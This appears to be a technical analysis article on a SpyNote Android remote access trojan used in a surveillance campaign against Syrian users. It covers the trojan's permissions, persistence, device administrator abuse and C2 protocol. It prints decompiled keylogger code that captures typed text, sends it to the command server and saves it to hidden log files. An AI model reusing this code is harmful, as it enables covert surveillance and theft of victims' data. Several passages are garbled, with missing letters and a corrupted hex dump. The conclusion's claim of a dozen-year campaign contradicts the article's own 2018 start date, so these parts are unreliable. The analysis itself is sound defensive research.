# An in-depth analysis of SpyNote remote access trojan
**bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan**
[Techniczne](https://bulldogjob.pl/readme/s/categories,tech)
Lookout [researchers have recently discovered a surveillance campaign targeting Syrian citizens and it is believed that the actor behind the](https://blog.lookout.com/nation-state-mobile-malware-targets-syrians-with-covid-19-lures)
attack was state-sponsored. The campaign had been active since January 2018 and its goal was to infect Android mobile devices with remote
access trojans (RATs) and then spy on people in possession of those devices.
The victims were tricked into downloading and installing innocent-looking mobile applications which were actually spyware. The applications
were shared through various communication channels; however, they were never available on the official Google Play Store. Some
applications attempted to masquerade as legitimate ones like Telegram, others were COVID-19 contact tracing apps or benign tools like a fake
digital thermometer, and others impersonated Android built-in tools. The common factor was that all of them had an additional functionality:
allowing the adversary to spy on the users who installed them.
In this article we will examine the internal workings of one of those applications to analyze its capabilities and understand how it is used by the
threat actors.
## What is a remote access trojan (RAT)?
[A Remote Access Trojan (RAT) is a type of malware that controls a system through a remote network connection. A RAT is typically installed](https://blog.malwarebytes.com/threats/remote-access-trojan-rat/)
without the victim's knowledge, often as payload of a trojan horse program, and will try to hide its operation from the victim and from security
software and other anti-virus software.
A RAT enables its operators to perform many activities on the compromised device (e.g. control a device's camera, access its storage,
intercept calls and text messages, etc.). This is all done via an easy-to-use application hosted on a command and control server.
## Executive summary
A sample Android application was chosen for analysis from a pool of 71 malicious ones reported by Lookout’s research. The sample examined
is an instance of the SpyNote RAT.
Chosen application details:
-----
After the application is installed, it is displayed as Android with the icon resembling the one of the built-in Android applications `Settings .`
_Malware icon_
```
AndroidManifest.xml file reveals that malware takes advantage of a number of permissions, allowing it to have, among others, the
```
following capabilities:
track location of the device (GPS and network-based)
make and intercept calls
access camera
access external storage
access contact list
read SMS
access microphone
displaying content over other applications
[clickjacking via Accessibility Services](https://www.makeuseof.com/tag/android-accessibility-services-can-used-hack-phone/)
## Technical details
-----
e t e d st but o c a e o t e app cat o sa p e e a s u o, t as su e y e e a a ab e o t e o c a Goog e ay Sto e
Most likely, the malware was spread via other means like a spearphishing attachment or a link.
A SpyNote client can masquerade as legitimate application. Static code analysis indicates that the malware, after successful installation, would
install a legitimate application embedded in the APK file at `res/raw/google.apk . Also, screenshots of cracked` [SpyNote server v6.4.4](https://www.youtube.com/watch?v=zJXk4FCHx_0)
proves that functionality:
_APK builder_
The adversary can pick a name of the application, service, its version, and the name of a victim to be able to differentiate them. This value can
be extracted from the res/values/strings.xml file. In this particular example they were set as follows:
```
Hamody
Android
Android
6.4.4
```
This sample did not include any additional applications and the file `res/raw/google.apk was empty.`
_google.apk file details_
It was left was so that the malware, when executed, simply loads the legitimate `android.settings.ACCESSIBILITY_SETTINGS intent:`
-----
_Accessibility intent_
_Code running accessibility intent_
Android applications, including malware, can listen for the BOOT_COMPLETED broadcast event to ensure the application will be activated
upon device start up, and this is the technique that SpyNote utilizes to achieve its persistence mechanism. As per the `AndroidManifest.xml`
file, the class that is receiving the `BOOT_COMPLETED event is` `com.android.tester.C4 :`
```
```
This class waits for the `BOOT_COMPLETED broadcast, checks if the` `com.android.tester.C11 service is already running, and, if not, initiates`
it. The service is responsible for processing commands received from the C2 server and is also the class where most of the code resides.
_com.android.tester.C4 class_
_code_
-----
Spy ote s ab e to d sco e sta ed app cat o s, so t at t e attac e s ca te c secu ty app a ces a e dep oyed to a de ce easo
for collection of the list of applications may be to discover high value applications like banking or messaging software. Application discovery is
achieved by using the `PackageManager class:`
_Application discovery code_
The above code not only extracts names of the installed applications, but also their installation dates and icons. This is what the operators
controlling the device see:
_List of extracted applications_
There is a large quantity of other data that malware extracts, most likely for the operators to be able to easily tell that it is running in a virtual
machine. The following are main information categories that the adversary takes advantage of:
device
system
SIM
WiFi
audio
Bluetooth
location
-----
For most Android Virtual Devices (AVDs), the data above will not vary too much by default and it is more than enough information to determine
whether the infected system is a real mobile device or an emulator.
_Extracted device information_
[It can also be seen on the footage that the tool embedded in SpyNote's C2 can be used to generate APKs. It is highly customizable and allows](https://www.youtube.com/watch?v=zJXk4FCHx_0)
the attacker to choose whether the application should be hidden or not. Other possibilities include enabling key logging, device administration,
leveraging SuperSU if the device is rooted, and deactivating icons.
_SpyNote APK builder_
SpyNote operators can use Device Administrator access to wipe data, lock it, or reset the password:
_Device Administrator actions_
-----
Spy ote a es use o t e access b ty by o e d g o `ccess b` `ty` `e t` et od to og eyst o es e ogs a e sa ed to e te a
storage to file configdd-MM-yyy.log where dd-MM-yyyy is the date of when the keystrokes were captured. The data can then be downloaded
by the malware operators.
```
public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) {
try {
String a = m1819a(accessibilityEvent); // accessibilityEvent.getText().toString();
String str = (String) accessibilityEvent.getPackageName();
StringBuilder sb = new StringBuilder();
if (a.startsWith("[") && a.endsWith("]")) {
a = a.substring(1, a.length() - 1);
}
if (!this.f1163b.equals(a)) {
this.f1163b = a;
if (str != null && a.length() != 0) {
String format = new SimpleDateFormat("HH:mm a", Locale.ENGLISH).format(new Date());
String str2 = new String("-1");
if (getApplicationContext().getResources().getString(R.string.gp).charAt(2) == '0') {
// redacted application icon extraction
}
if (str != null && a != null && format != null) {
if (C11.f1164A) {
C11.m1858a(C11.m1851a(C11.f1181m, 50) + C11.f1175f + C11.m1851a(C11.f1181m, 115) + C11.f1175f + str2 +
C11.f1177h + a + C11.f1177h + str + C11.f1177h + format); // send to C&C
}
sb.append(str2 + C11.f1177h + a + C11.f1177h + str + C11.f1177h + format + C11.f1176g);
String string2 = getApplicationContext().getResources().getString(R.string.s);
if ("mounted".equals(Environment.getExternalStorageState())) {
File file = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/" +
string2.trim());
if (!file.exists()) {
file.mkdirs();
}
try {
String format = new SimpleDateFormat("dd-MM-yyyy", Locale.ENGLISH).format(new Date());
String string = getApplicationContext().getResources().getString(R.string.s);
File file = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/" +
string.trim());
if (file.exists()) {
FileWriter fileWriter = new FileWriter(file.getPath() + "/config" + format + ".log", true);
fileWriter.write(sb.toString());
fileWriter.close();
}
} catch (IOException unused) {
}
}
}
}
}
} catch (Exception unused) {
}
}
```
The spyware has a File Manager feature allowing access to files like application data, pictures, downloads, and others, that are kept in the
external storage:
-----
_File Manager feature code_
_File Manager as seen by the attackers_
SpyNote has a location tracking feature based on GPS and network data. The location data is obtained by registering `LocationListener`
using `requestLocationUpdates method from` `LocationManager class.`
Moreover, a remote command can be issued to capture audio or camera feed. The code is designed to allow live footage to be obtained from
all cameras available on a device with additional capabilities like zoom, flash etc.
-----
_Audio recording code_
The collected data exfiltration is achieved over the command and control channel. All commands and data are sent via the normal
communications channel. All traffic sent by a victim's device is compressed before being sent using java.util.zip.GZIPOutputStream class:
_Data compression code_
Command and control (C2, C&C) traffic is sent over an uncommonly used port tcp/215, but it is also possible for SpyNote to communicate via
any other TCP port. The IP address and port are chosen during the APK building process:
_C2 server configuration_
SpyNote uses a custom TCP protocol for C&C communications:
-----
_SpyNote protocol visualization_
The traffic always starts with the payload size followed by a 0x00 null byte. The payload from a victim to the C2 server is always GZIP
**DEFLATE-compressed and, thus, starts with** [0x1f8b08 bytes.](https://tools.ietf.org/html/rfc1952#section-2.2)
The above payload was the initial one sent to the C2 and can be easily decompressed:
$ echo
"1f8b0800000000000000ad56c9d6ab380e7e957f559b2c98032c0d98314098033b8600614e026178fa22b953dfdb7d4ed7a2744e6c7db290654976
| xxd -r -p | zcat
1025310249null10249100&false10249w410249510249null &
null10249/9j/4AAQSkZJRgABAQAAAQABAAD/4gIoSUNDX1BST0ZJTEUAAQEAAAIYAAAAAAIQAABtbnRyUkdCIFhZWiAAAAAAAAAAAAAAAAB
Android SDK built for x861024910 & 2910249f60598b565b235cd102491024910248null
The above [base64 string is an encoded JPG file containing a part of the device's screen:](https://tools.ietf.org/html/rfc4648)
_Extracted part of the device screen_
After the initial payload is sent to the C2 server, the beaconing activity between the device and the C&C server begins:
_Beaconing traffic_
The server sends 35 00 70 6f 69 6e 67 which is similar to the described protocol above:
0x35 - payload size (5 ASCII)
0x00 - null byte
0x706f696e67 - poing in ASCII
The victim responds with:
-----
0 333300 8b0800000000000000 b 8cd d303 303 b c8 bcdc90 00 d3 eed0d000000
0x3333 - payload size (33 ASCII)
0x00 - null byte
0x1f8b08000000000000002b28cd2d30343032b1c82bcdc901007d342eed0d000000 - GZIP compressed string pump10248null
## Conclusion
Analysis of the SpyNote sample indicates that the threat actors behind the surveillance campaign had extensive control over victims' devices.
Not only does this piece of malware have considerable features, but it is also highly customizable to evade detection and deceive victims into
downloading, installing, and providing full access to their devices. Having that in mind, it should not be surprising that the adversary was able
to run the campaign for over a dozen years. It is also clear that users should be educated not to install mobile applications from non-official
application stores. Moreover, Device Administrator privilege should only be granted to, if any, trusted applications.
## Detection
### Indicators of compromise (IOCs)
MITRE ATT&CK Techniques
-----